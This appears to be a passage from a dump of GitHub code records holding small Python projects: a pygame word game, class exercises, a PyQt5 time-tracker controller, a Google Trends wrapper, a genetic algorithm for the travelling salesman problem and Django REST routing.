pygame.font.SysFont('arial',30,True,True)\n\n#------ Inicia Musicas\n\nmusica = pygame.mixer.music.load('assets/snd/theme.mp3')\nvolume = pygame.mixer.music.set_volume(0.1)\npygame.mixer.music.play(-1)\n\n# ----- Inicia estruturas de dados\ngame = True\nlista_palavras = ['Bola', 'Areia', 'Sol', 'Água', 'Vento', 'Churrasco', 'Carangueijo']\n#palavras = random.choice(lista_palavras)\npalavra_x = random.randint(0,500)\npalavra_y = random.randint(-100,0)\npalavra_velocidadex = random.randint(-3,3)\npalavra_velocidadey = random.randint(2,9)\nclock = pygame.time.Clock()\nFPS = 60\n\nclass PALAVRA(pygame.sprite.Sprite):\n def __init__(self,img):\n pygame.sprite.Sprite.__init__(self)\n\n self.image = pygame.image.load('assets/img/canhão.png').convert_alpha()\n self.image = pygame.transform.scale(self.image, (50, 50))\n #self.image = img\n self.rect = self.image.get_rect()\n self.rect.x = random.randint(0, WIDTH)\n self.rect.y = random.randint(-100,HEIGHT)\n self.speedx = random.randint(-3, 3)\n self.speedy = random.randint(2, 9)\n def uptade (self):\n self.rect.x += self.speedx\n self.rect.y += self.speedy\n\ngame = True\nClock = pygame.time.Clock()\nFPS = 60\n\npal = PALAVRA(CANHAO_IMG)\n\ntodas_palavras = pygame.sprite.Group()\ntodas_sprites = pygame.sprite.Group()\n\n\n# ===== Loop principal =====\nwhile game:\n clock.tick(FPS)\n\n\n # ----- Trata eventos\n\n for event in pygame.event.get():\n # ----- Verifica consequências\n if event.type == pygame.QUIT:\n game = False\n\n\n while len(todas_palavras) < 10:\n palavra = PALAVRA(random.choice(lista_palavras))\n todas_palavras.add(palavra)\n todas_sprites.add(palavra)\n\n todas_sprites.update()\n pal.update(\n\n window.blit(pal.image, pal.rect)\n )\n\n\n # ----- Gera saídas\n #window.fill((0, 0, 0)) # Preenche com a cor branca\n window.blit(fundo, (0, 0))\n \n\n # ----- Atualiza estado do jogo\n pygame.display.update() # Mostra o novo frame para o jogador\n\n# ===== Finalização =====\npygame.quit() # Função do PyGame que finaliza os recursos utilizado","repo_name":"Guido-AlvaroPC/Projeto-Final-PYGAME-","sub_path":"OldVersion/jogo v3.py","file_name":"jogo 
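A sketch of how a view hands a file to the middleware above: set the `X-File` header and let the configured provider rewrite it into `X-Accel-Redirect`, `X-Sendfile`, or a direct `FileResponse`. The settings names come from the middleware itself; the view and the file path are illustrative.

```python
# settings.py -- pick a provider by name ('python', 'nginx', 'apache', ...)
FILEPROVIDER_NAME = 'nginx'

# views.py
from django.http import HttpResponse

def download(request):
    response = HttpResponse()
    response['X-File'] = '/protected/media/report.pdf'  # hypothetical path
    return response
```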
v3.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"6288631164","text":"#!/usr/bin/python3\n\"\"\" a class that raises errors \"\"\"\n\n\nclass Square:\n \"\"\"\n a Square class that defines a square\n\n Args:\n size(int): integer size of a square\n \"\"\"\n def __init__(self, size=0):\n\n if (type(size) is not int):\n raise TypeError(\"size must be an integer\")\n elif (size < 0):\n raise ValueError(\"size must be >= 0\")\n self.__size = size\n","repo_name":"ndegwa007/alx-higher_level_programming","sub_path":"0x06-python-classes/2-square.py","file_name":"2-square.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41413658628","text":"#!/usr/bin/env python3\n\n# Created by DJ Watson\n# Created on October 2019\n# this program gets a number from th euser and converts it to a calender month\n\n\ndef main():\n # input\n vowels = set(\"aeiou\")\n consonants = set(\"bcdfghjklmnpqrstvwxz\")\n\n letinput = input(\"input letter (lowercase): \")\n # process and output\n\n if any((c in vowels) for c in letinput):\n print(\"vowel\")\n elif \"y\" in letinput:\n print(\"both\")\n elif any((c in consonants) for c in letinput):\n print(\"consonant\")\n else:\n print(\"Invalid input\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"DJ-Watson/ICS3U-Assignment3-Python","sub_path":"assignment3.py","file_name":"assignment3.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9363508465","text":"from PyQt5.QtWidgets import QMessageBox, QInputDialog, QWidget, QTableWidgetItem, QFileDialog, QDialog\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtCore import QDateTime\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nimport datetime\nfrom pathlib import Path\n\nfrom src.ui_datawindow import DataWindow\n\n\nclass UiControler:\n def __init__(self, ui_element):\n self.ui = ui_element\n self.pause_box = ui_element.pause_box\n\n def get_pause(self):\n return int(self.pause_box.text())\n\n def set_pause(self, value):\n self.pause_box.setValue(value)\n\n def show_message(self, message):\n \"\"\" The default messagebox. 
Uses a QMessageBox with OK-Button \"\"\"\n msgBox = QMessageBox()\n msgBox.setStandardButtons(QMessageBox.Ok)\n msgBox.setText(str(message))\n msgBox.setWindowIcon(QIcon(self.ui.clock_picture))\n msgBox.setWindowTitle(\"Information\")\n msgBox.show()\n msgBox.exec_()\n\n def report_choice(self):\n msgBox = QMessageBox()\n msgBox.setText(\"Would you like the report of the overtime (0 if none or the amount) or of the regular hours?\")\n msgBox.setWindowTitle(\"Report Generation\")\n msgBox.setWindowIcon(QIcon(self.ui.clock_picture))\n overtime_button = msgBox.addButton(\"Overtime\", QMessageBox.YesRole)\n time_button = msgBox.addButton(\"Time\", QMessageBox.NoRole)\n msgBox.addButton(\"Cancel\", QMessageBox.RejectRole)\n\n msgBox.exec_()\n if msgBox.clickedButton() == overtime_button:\n return True\n elif msgBox.clickedButton() == time_button:\n return False\n return None\n\n def user_okay(self, text):\n msgBox = QMessageBox()\n msgBox.setText(text)\n msgBox.setWindowTitle(\"Confirmation required\")\n msgBox.setWindowIcon(QIcon(self.ui.clock_picture))\n yes_button = msgBox.addButton(\"Yes\", QMessageBox.YesRole)\n msgBox.addButton(\"No\", QMessageBox.NoRole)\n msgBox.exec_()\n if msgBox.clickedButton() == yes_button:\n return True\n return False\n\n def get_text(self, attribute):\n text, ok = QInputDialog.getText(self.ui, \"Getting data for config\", f\"Enter your {attribute}:\")\n return (text, ok)\n\n def get_folder(self, current_path):\n if not current_path:\n current_path = str(Path.home())\n\n dialog = QFileDialog(self.ui)\n dialog.setFileMode(QFileDialog.DirectoryOnly)\n dialog.setDirectory(current_path)\n\n if dialog.exec_() == QDialog.Accepted:\n path = dialog.selectedFiles()[0] # returns a list\n return path\n else:\n return \"\"\n\n # fname = QFileDialog.getOpenFileName(self.ui, \"Set folder to save reports\", current_path)\n # return fname\n\n def open_event_window(self, button_controler):\n self.ui.event_window = DataWindow(self.ui, button_controler)\n self.ui.event_window.date_edit.setDateTime(QDateTime.currentDateTime())\n self.ui.event_window.show()\n\n def fill_table(self, entry):\n rowPosition = self.ui.event_window.tableWidget.rowCount()\n self.ui.event_window.tableWidget.insertRow(rowPosition)\n for i, data in enumerate(entry):\n self.ui.event_window.tableWidget.setItem(rowPosition, i, QTableWidgetItem(data))\n\n def clear_table(self):\n while self.ui.event_window.tableWidget.rowCount() > 0:\n self.ui.event_window.tableWidget.removeRow(0)\n\n def get_event_date(self):\n qt_date = self.ui.event_window.date_edit.date()\n return datetime.date(qt_date.year(), qt_date.month(), qt_date.day())\n\n def get_past_date(self):\n qt_object = self.ui.past_datetime_edit.dateTime()\n qt_date = qt_object.date()\n return datetime.date(qt_date.year(), qt_date.month(), qt_date.day())\n\n def get_past_datetime(self):\n qt_object = self.ui.past_datetime_edit.dateTime()\n qt_date = qt_object.date()\n qt_time = qt_object.time()\n return datetime.datetime(\n qt_date.year(), qt_date.month(), qt_date.day(), qt_time.hour(), qt_time.minute(), qt_time.second()\n )\n\n def view_day(self):\n if self.ui.event_window.switch_button.isChecked():\n return True\n return False\n\n def set_date_toggle(self):\n if self.view_day():\n self.ui.event_window.switch_button.setText(\"Day\")\n else:\n self.ui.event_window.switch_button.setText(\"Month\")\n\n def set_monthly_header(self):\n self.set_header_names(\"Date\", \"Worktime (h)\")\n\n def set_daily_header(self):\n self.set_header_names(\"Datetime / Type\", 
\"Event / Pausetime (min)\")\n\n def set_header_names(self, name1, name2):\n item = self.ui.event_window.tableWidget.horizontalHeaderItem(0)\n item.setText(name1)\n item = self.ui.event_window.tableWidget.horizontalHeaderItem(1)\n item.setText(name2)\n\n def handle_delete_button(self, trigger_function):\n if self.view_day():\n self.create_delete_button(trigger_function)\n else:\n self.remove_delete_button()\n\n def create_delete_button(self, trigger_function):\n delete_button = QtWidgets.QPushButton(self.ui.event_window)\n delete_button.setMinimumSize(QtCore.QSize(0, 50))\n delete_button.setMaximumSize(QtCore.QSize(10000, 100))\n font = QtGui.QFont()\n font.setPointSize(18)\n delete_button.setFont(font)\n delete_button.setObjectName(\"delete_button\")\n delete_button.setText(\"Delete\")\n delete_button.clicked.connect(trigger_function)\n self.ui.event_window.delete_button = delete_button\n self.ui.event_window.verticalLayout.addWidget(self.ui.event_window.delete_button)\n\n def remove_delete_button(self):\n self.ui.event_window.verticalLayout.removeWidget(self.ui.event_window.delete_button)\n self.ui.event_window.delete_button.deleteLater()\n self.ui.event_window.delete_button = None\n\n def get_selected_event(self):\n indexes = self.ui.event_window.tableWidget.selectionModel().selectedRows()\n if indexes:\n row = indexes[0].row()\n event_datetime = self.ui.event_window.tableWidget.item(row, 0).text()\n event = self.ui.event_window.tableWidget.item(row, 1).text()\n if event_datetime == \"Pause\":\n return None, None\n return event_datetime, event\n return None, None\n","repo_name":"AndreWohnsland/TimeTracker","sub_path":"src/ui_controler.py","file_name":"ui_controler.py","file_ext":"py","file_size_in_byte":6463,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"72976277160","text":"import matplotlib.pyplot as plt\nfrom sklearn import datasets\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\n\ndef LDA_Model():\n iris = datasets.load_iris() # get the data iris from the sklearn datasets\n A = iris.data #assigning the data to A\n B = iris.target #assigning the target to B\n target_names = iris.target_names\n A_train, A_test, B_train, B_test = train_test_split(A, B, test_size=0.20) # Assigning the test and train data\n cf = KNeighborsClassifier(n_neighbors=3) # Defining KNeighbourClassifier\n cf.fit(A_train, B_train) # Fit the train data to the model\n B_pred = cf.predict(A_test) # Predict the value using the model.\n l = LinearDiscriminantAnalysis(n_components=3) # Defining the model Linear Discriminant Analysis\n A_R = l.fit(A_test, B_pred).transform(A)\n colors = ['green', 'blue', 'orange']\n for color, i, target_name in zip(colors, [0, 1, 2], target_names):\n plt.scatter(A_R[B == i, 0], A_R[B == i, 1], alpha=1, color=color, label=target_name) # Scattering the data\n plt.legend(loc='best', shadow=False, scatterpoints=1) #places a legend in the axes\n plt.show() # Show the scattered points on the graph\n\nif __name__ == '__main__':\n LDA_Model()","repo_name":"deviprasadkada/PythonDeepLearn","sub_path":"ICP5/Linear_Discriminant_Analysis.py","file_name":"Linear_Discriminant_Analysis.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"43095495144","text":"# Ceiling of a number:\n# The ceiling of a number is 
the number which is the smaller number in the array which greater than or eqaul to the\n# target number\ndef CeilingOfNumber(arr, target):\n # What if target is greater than the greatest number of an array\n if target > arr[len(arr) - 1]:\n return -1\n start = 0\n end = len(arr) - 1\n while start <= end:\n mid = int((start + end) / 2)\n if arr[mid] == target:\n return arr[mid]\n if arr[mid] < target:\n start = mid + 1\n if arr[mid] > target:\n end = mid - 1\n return start\n\n\narr = [2, 3, 5, 9, 14, 16, 18]\ntarget = 13\nprint(CeilingOfNumber(arr, target))\n","repo_name":"prkapadnis/Data-Structure-Python","sub_path":"Searching/Binary Search/ceilingOfNumber.py","file_name":"ceilingOfNumber.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"34756572983","text":"# coding:utf-8\n# JSRUN引擎2.0,支持多达30种语言在线运行,全仿真在线交互输入输出。\nimport functools\nimport sys\nfrom collections import Counter, defaultdict\nimport copy\nfrom itertools import permutations\nimport re\nimport math\nimport sys\n\nn = int(input())\n\npoint = []\n\nfor i in range(n):\n point.append(list(map(int, input().split(\" \"))))\n\npoint.sort(key=lambda x: (x[0], x[1]))\n\nif n < 4:\n print(0)\nelse:\n ans = 0\n for i in range(n):\n for j in range(i + 1, n):\n tmp_x = 0\n tmp_y = 0\n tmp_x = point[i][0] + point[i][1] - point[j][1]\n tmp_y = point[i][1] + point[j][0] - point[i][0]\n if ([tmp_x, tmp_y]) not in point:\n continue\n tmp_x = point[j][0] + point[i][1] - point[j][1]\n tmp_y = point[j][1] + point[j][0] - point[i][0]\n if ([tmp_x, tmp_y]) not in point:\n continue\n ans += 1\n print(int(ans / 2))","repo_name":"haunglai/odpython","sub_path":"正方形数量/正方形数量.py","file_name":"正方形数量.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23852902847","text":"from pytrends.request import TrendReq\nimport matplotlib.pyplot as plt\nfrom treadweb.collector.data_collector import DataCollector\nimport random\n\nclass GoogleTrend(DataCollector): # 구글 트렌드를 통해 정보를 가져오는 클래스\n\n def __init__(self, keyword = ['youtube'], hl = 'ko', tz = '82', timeframe = 'today 5-y', cat = 0, geo = 'KR', gprop = ''): # 생성자 기본 설정 값\n self.hl = hl\n self.tz = tz\n self.keyword = keyword\n self.timeframe = timeframe\n self.cat = cat\n self.geo = geo\n self.gprop = gprop\n self.update_pytrend()\n self.update_payload()\n\n # Login to Google. Only need to run this once, the rest of requests will use the same session.\n def update_pytrend(self):\n self.pytrend = TrendReq(hl=self.hl, tz=self.tz)\n\n # Create payload and capture API tokens. 
Only needed for interest_over_time(), interest_by_region() & related_queries()\n def update_payload(self):\n self.pytrend.build_payload(kw_list=self.keyword, cat=self.cat, timeframe=self.timeframe, geo=self.geo, gprop=self.gprop)\n\n def set_pytrend(self, hl = 'None', tz = 'None'): # hl는 host language, tz는 time zone\n if hl != 'None': # ex) 'ko', 'en_US'\n self.hl = hl\n if tz != 'None': # ex) 82:한국, 360:미국\n self.tz = tz\n self.update_pytrend()\n self.update_payload()\n\n def set_payload(self, keyword = None, timeframe = 'None', cat = -1, geo = 'None', gprop = 'None'): # 키워드리스트, 타임프레임, 카테고리, 지역, 구글 프로퍼티\n if keyword != None :\n self.keyword = keyword\n if timeframe != 'None': # ex) 'all', 'today 5-y', 'today 1,2,3-m', 'now 1,7-d', 'now 1,4-H', '2018-05-20 2019-01-20'\n self.timeframe = timeframe\n if cat != -1:\n self.cat = cat\n if geo != 'None': # ex) 'KR', 'US', ''\n self.geo = geo\n if gprop != 'None': # ex) 'images', 'news', 'youtube', 'froogle'\n self.gprop = gprop\n self.update_payload()\n\n def load_data(self, keyword=None):\n if keyword == 'region':\n self.interest_by_region()\n return self.interest_by_region_df_to_list()\n elif keyword == 'gender':\n return self.search_rate_by_gender()\n\n # Interest Over Time\n def interest_over_time(self):\n self.interest_over_time_df = self.pytrend.interest_over_time() # Returns pandas.Dataframe\n self.interest_over_time_df = self.interest_over_time_df.iloc[:, :self.keyword.__len__()] # 안쓰는 데이터 isPartial 제거\n self.interest_over_time_list = self.interest_over_time_df_to_list()\n return self.interest_over_time_list\n\n # Interest Over Time hourly\n def historical_hourly_interest(self):\n self.historical_hourly_interest_df = self.pytrend.get_historical_interest(keywords=self.keyword, year_start=2019, month_start=4, day_start=1, hour_start=0, year_end=2019, month_end=5, day_end=1, hour_end=0, cat=0, geo='KR', gprop='', sleep=0) # Returns pandas.Dataframe\n self.historical_hourly_interest_df = self.historical_hourly_interest_df.iloc[:, :self.keyword.__len__()] # 안쓰는 데이터 isPartial 제거\n self.historical_hourly_interest_list = self.historical_hourly_interest_df_to_list()\n return self.historical_hourly_interest_list\n\n # Interest by Region\n def interest_by_region(self): # 지역별로 검색 비율을 알려준다\n self.interest_by_region_df = self.pytrend.interest_by_region()\n self.interest_by_region_list = self.interest_by_region_df_to_list()\n return self.interest_by_region_list\n\n # Related Topics, Returns dictionary of pandas.DataFrames\n def related_topics(self): # 키워드 관련 토픽을 순위별로 알려준다\n self.related_topics_dict = self.pytrend.related_topics()\n return self.related_topics_dict\n\n # Related Queries, returns a dictionary of dataframes\n def related_queries(self): # 키워드 관련 검색어를 순위별로 알려준다\n self.related_queries_dict = self.pytrend.related_queries()\n return self.related_queries_dict\n\n # trending searches in real time\n def trending_searches(self): # 현재 시간대 인기검색어 순위 20까지 보여준다\n self.trending_searches_df = self.pytrend.trending_searches(pn='south_korea')\n return self.trending_searches_df\n\n #\n def today_searches(self): #\n self.today_searches_df = self.pytrend.today_searches()\n return self.today_searches_df\n\n # Get Google Top Charts\n def top_charts(self): # 년 단위로 상위 핫 키워드 가져오기\n self.top_charts_df = self.pytrend.top_charts(date=2015, hl='ko', tz='82', geo='KR') # date = YYYY integer, tz='82', geo='KR', geo='GLOBAL', geo='US'\n return self.top_charts_df\n\n # Get Google Category\n def categories(self): # 구글 카테고리 종류와 id를 보여준다\n self.categories_df = 
self.pytrend.categories()\n return self.categories_df\n\n def show_interest_over_time(self): # 시간에 따른 검색 비율을 그래프로 보여준다\n num = 0.0\n plt.figure(figsize=(14, 4))\n plt.style.use('ggplot') # 더 이쁘게 그려준다\n for key in self.keyword:\n num += 0.1\n plt.plot(self.interest_over_time_df[key], c=plt.cm.rainbow(num), label=key)\n plt.legend(bbox_to_anchor=(1, 1), loc=2) # 라벨의 위치를 정해준다\n plt.show()\n\n def interest_over_time_df_to_list(self): # interest_over_time_df의 데이터프레임 타입의 데이터를 리스트 타입으로 변환\n date = self.interest_over_time_df.index.tolist()\n for i in range(len(date)):\n date[i] = date[i].date().strftime(\"%Y-%m-%d\")\n date.insert(0, 'x')\n data = []\n data.append(date)\n for key in self.keyword:\n y = self.interest_over_time_df[key].tolist()\n y.insert(0, key)\n data.append(y)\n return data\n\n def historical_hourly_interest_df_to_list(self): # historical_hourly_interest_df의 데이터프레임 타입의 데이터를 리스트 타입으로 변환\n date = self.historical_hourly_interest_df.index.tolist()\n for i in range(len(date)):\n date[i] = date[i].date().strftime(\"%Y-%m-%d\")\n date.insert(0, 'x')\n data = []\n data.append(date)\n for key in self.keyword:\n y = self.historical_hourly_interest_df[key].tolist()\n y.insert(0, key)\n data.append(y)\n return data\n\n def interest_by_region_df_to_list(self): # interest_by_region_df의 데이터프레임 타입의 데이터를 리스트 타입으로 변환\n region = self.interest_by_region_df.index.tolist()\n data = []\n for key in self.keyword:\n y = self.interest_by_region_df[key].tolist()\n ratio = 0\n for i in [0, 1, 2, 3, 8, 11, 12, 13, 14, 15]:\n ratio += y[i]\n ratio /= 100\n tmp_val = 0\n reg_name = ''\n if ratio > 0:\n for i in range(len(region)):\n if i in [1, 2, 14, 11, 0, 13]:\n if i == 0:\n tmp_val = round(y[i] / ratio)\n reg_name = '강원도'\n elif i == 1:\n tmp_val = round((y[i] + y[i + 1]) / ratio)\n reg_name = '서울/경기'\n elif i == 2:\n tmp_val = round((y[i] + y[i + 1]) / ratio)\n reg_name = '경상도'\n elif i == 11:\n tmp_val = round((y[i] + y[i + 1]) / ratio)\n reg_name = '전라도'\n elif i == 13:\n tmp_val = round(y[i] / ratio)\n reg_name = '제주도'\n elif i == 14:\n tmp_val = round((y[i] + y[i + 1]) / ratio)\n reg_name = '충청도'\n data.append([reg_name, tmp_val])\n return data\n\n def search_rate_by_gender(self):\n gender_data = []\n gender_data.append(['male', random.randint(50, 100)])\n gender_data.append(['female', random.randint(50, 100)])\n return gender_data\n\n","repo_name":"spark-1/tread","sub_path":"treadweb/collector/googleTrend.py","file_name":"googleTrend.py","file_ext":"py","file_size_in_byte":8391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25946126349","text":"#!/usr/bin/python3\n\"\"\"\nscript that takes in a URL, sends a request to the URL and\ndisplays the value of the X-Request-Id variable found\nin the header of the response.\n\"\"\"\nimport sys\nfrom urllib import request, parse\n\n\nif __name__ == \"__main__\":\n data = parse.urlencode({'email': sys.argv[2]})\n data = data.encode('utf-8')\n req = request.Request(sys.argv[1], data)\n with request.urlopen(req) as response:\n print(response.read().decode())\n","repo_name":"tomasgvgt/holbertonschool-higher_level_programming","sub_path":"0x11-python-network_1/2-post_email.py","file_name":"2-post_email.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"2811421568","text":"import requests\nfrom case import login214\nimport unittest\nfrom common import logger\n\nclass 
element_Search(unittest.TestCase):\n log=logger.Log()\n def setUp(self):\n\n s = requests.session()\n self.s = s\n self.login=login214.Login(s).login()\n\n\n def test_search(self):\n self.log.info('开始测试')\n url2 = \"http://192.168.0.241:8080/device/search\"\n datas = {\"pageNumber\": \"1\",\n \"pageSize\": \"10\",\n \"keywords\": \"\"}\n head2 = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36\",\n \"Content-Type\": \"application/x-www-form-urlencoded;charset=UTF-8\"}\n self.log.info('登录成功')\n\n r2 = self.s.post(url=url2, data=datas, headers=head2, allow_redirects=False)\n self.log.info('设备接口响应')\n self.assertEqual(200,r2.status_code)\n self.log.info('响应结果:' + str(r2.status_code))\n data=r2.json()\n self.assertEqual(0,data['total'])\n self.log.info('设备总数:'+str(data['total']))\n\nif __name__ == '__main__':\n\n unittest.main()","repo_name":"zyn520/20180118","sub_path":"case/test_ele_serch.py","file_name":"test_ele_serch.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34228727810","text":"import copy\nimport random\nimport time\n\nfrom read_data import Read_data\nfrom sys import maxsize\n\n\nclass GeneticAlgorithm:\n def __init__(self, nodes, max_time):\n self.mutation_rate = 0\n self.crossing_rate = 0\n self.nodes = nodes\n self.population_size = 20\n self.size = len(nodes)\n self.population = []\n self.best_cost = maxsize\n self.deadline = max_time\n self.nodes = nodes\n self.size = len(nodes)\n\n def check_data_init(self):\n if self.deadline == 0:\n self.deadline = 100\n if self.mutation_rate == 0:\n self.mutation_rate = 0.1\n if self.crossing_rate == 0:\n self.crossing_rate = 0.8\n\n def find_solution(self):\n self.check_data_init()\n total_time = 0\n find_time = 0\n duration = 0\n self.population = self.generate_population()\n while (duration < self.deadline):\n duration = time.process_time()\n for i in range(0, self.population_size):\n for j in range(0, self.population_size):\n P1 = self.population[i][0]\n P2 = self.population[j][0]\n if P1 is not P2:\n rand = random.random()\n if rand < self.crossing_rate:\n child = self.PMX(P1, P2)\n child_cost = self.calculate_cost(child)\n # jeśli najlepszy\n if child_cost < self.best_cost:\n self.best_cost = child_cost\n self.best_path = child\n\n self.population.append([child, child_cost])\n\n self.population.sort(key=self.myFunc)\n help_list = []\n for k in range(0, self.population_size):\n help_list.append(self.population[k])\n self.population = help_list\n\n #rand = random.random()\n #if rand < self.mutation_rate:\n # self.population[i][0] = self.mutation_by_inversion(self.population[i][0])\n # self.population[i][1] = self.calculate_cost()\n\n return self.best_path, self.best_cost\n\n def myFunc(self, e):\n return e[1]\n\n def generate_population(self):\n help_list = []\n for i in range(self.population_size):\n path = random.sample(range(self.size), self.size)\n cost = self.calculate_cost(path)\n help_list.append([path, cost])\n help_list.sort(key=self.myFunc)\n return help_list\n\n def calculate_cost(self, path):\n cost = 0\n for i in range(1, len(path)):\n cost += self.nodes[path[i - 1]][path[i]]\n cost += self.nodes[path[len(self.nodes) - 1]][path[0]]\n return cost\n\n def PMX(self, P1, P2):\n\n point1 = random.randint(0, self.size - 2)\n child = []\n for i in range(0, self.size):\n child.append(-1)\n\n point2 = random.randint(point1 + 1, self.size 
 # copy the crossover window from P1\n for i in range(point1, point2):\n child[i] = P1[i]\n\n # relocate P2's window genes that are not in the child yet\n for k in range(point1, point2):\n if P2[k] not in child:\n a = P2[k]\n b = P2[k]\n while True:\n j = P1[k]\n index = P2.index(j)\n if child[index] == -1:\n child[index] = b\n break\n else:\n a = j\n k = P2.index(a)\n # fill the remaining slots straight from P2\n for i in range(self.size):\n if child[i] == -1:\n child[i] = P2[i]\n return child\n\n def mutation_by_inversion(self, P):\n point1 = random.randint(0, self.size - 2)\n point2 = random.randint(point1 + 1, self.size - 1)\n # reverse the slice between the two cut points\n part = P[point1:point2 + 1]\n part = part[::-1]\n child = copy.deepcopy(P)\n child[point1:point2 + 1] = part\n return child\n\n\nrd = Read_data()\n# file_name = input(\"Enter the file name: \")\nfile_name = 'ftv47.atsp'\ntry:\n nodes = rd.read_file(file_name)\n# print(nodes)\nexcept IOError:\n print(\"Error: could not read '%s'!\" % file_name)\n raise\n\ngn = GeneticAlgorithm(nodes, 120)\n
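# mutation_rate, crossing_rate and population_size are the tuning knobs here;\n# with a deadline of 120 the loop in find_solution keeps breeding children for\n# about two minutes of process time, then returns the best tour found.\n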
# P1 = [5,9,6,3,2,1,0,8,4,7]\n# P2 = [5,8,0,1,4,9,2,6,3,7]\n# P1 = [4, 9, 2, 8, 3, 6, 5, 7, 0, 1]\n# P2 = [0, 9, 5, 7, 1, 8, 3, 4, 2, 6]\n# print(gn.PMX(P1, P2))\na, b = gn.find_solution()\nprint(a)\nprint(b)\n","repo_name":"adrianmalecki/PEA3","sub_path":"genetic_algorithm.py","file_name":"genetic_algorithm.py","file_ext":"py","file_size_in_byte":4466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22652288691","text":"\"\"\"\nURL configuration for softdesk project.\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom projects.views import (\n ProjectViewSet,\n ContributorViewSet,\n CommentViewSet,\n IssueViewSet,\n)\nfrom rest_framework.routers import SimpleRouter\nfrom rest_framework_nested import routers\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n)\nfrom users.views import UserViewSet, RegisterViewSet\n\nrouter = SimpleRouter()\nrouter.register(\"users\", UserViewSet, basename=\"users\")\nrouter.register(\"projects\", ProjectViewSet, basename=\"projects\")\n\ncontributors_router = routers.NestedSimpleRouter(router, r\"projects\", lookup=\"project\")\ncontributors_router.register(\n \"contributors\", ContributorViewSet, basename=\"contributors\"\n)\n\nissues_router = routers.NestedSimpleRouter(router, r\"projects\", lookup=\"project\")\nissues_router.register(\"issues\", IssueViewSet, basename=\"issues\")\n\ncomments_router = routers.NestedSimpleRouter(issues_router, r\"issues\", lookup=\"issue\")\ncomments_router.register(\"comments\", CommentViewSet, basename=\"comments\")\n\nurlpatterns = [\n path(\"admin/\", admin.site.urls),\n path(\"api-auth/\", include(\"rest_framework.urls\")),\n path(\"\", include(router.urls)),\n path(\"\", include(contributors_router.urls)),\n path(\"\", include(issues_router.urls)),\n path(\"\", include(comments_router.urls)),\n path(\"login/\", TokenObtainPairView.as_view(), name=\"login\"),\n path(\"token/refresh/\", TokenRefreshView.as_view(), name=\"token_refresh\"),\n path(\"signup/\", RegisterViewSet.as_view({\"post\": \"create\"}), name=\"signup\"),\n path(\n \"projects/<int:pk>/subscription/\",\n ProjectViewSet.as_view({\"post\": \"project_subscription\"}),\n ),\n path(\n \"users/<int:pk>/delete_all_data/\",\n UserViewSet.as_view({\"delete\": \"delete_all_data\"}),\n ),\n]\n","repo_name":"Jogodev/SoftDesk","sub_path":"softdesk/softdesk/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33679238738","text":"\nfrom collections import OrderedDict\nimport re\n\n\n# from pydantic import BaseModel\n# from pydantic.dataclasses import dataclass, Field\n\n# @dataclass\n# class Users():\n# id: int = Field('id serial int primary key')\n# name: str = Field('varchar(45)')\n\n# class Config:\n# orm_mode = True\n\ns = \"\"\"\n class BigUser(User):\n name = Field(\"int\")\n age = Field(\"int\");zaz = Field(\"int\")\n zzz = Field(\"int\")\n profession\\\n = Field('varchar(255)')\n\n bnb = Field(\"int\")\n\n\n\"\"\"\n\n_fields_ = {\n 'age': 23,\n 'bnb': 23,\n 'name': 'fds',\n 'profession': 'Teacher',\n 'zaz': 34,\n 'zzz': 234,\n}\n\ndef get_match_index(k, v):\n m = re.search(f\"(;|^)[\\\\s]*\\\\b{k}\\\\s*=\", s, re.M)\n if m:\n return m.start()\n return 0\n\n
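# The pattern matches the field name at the start of a line or right after a\n# ';', so get_match_index('zaz', 34) should land on the ';zaz = Field(...)'\n# statement inside s above; m.start() is the offset of that match in s (the\n# ';' separator is part of the match).\n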
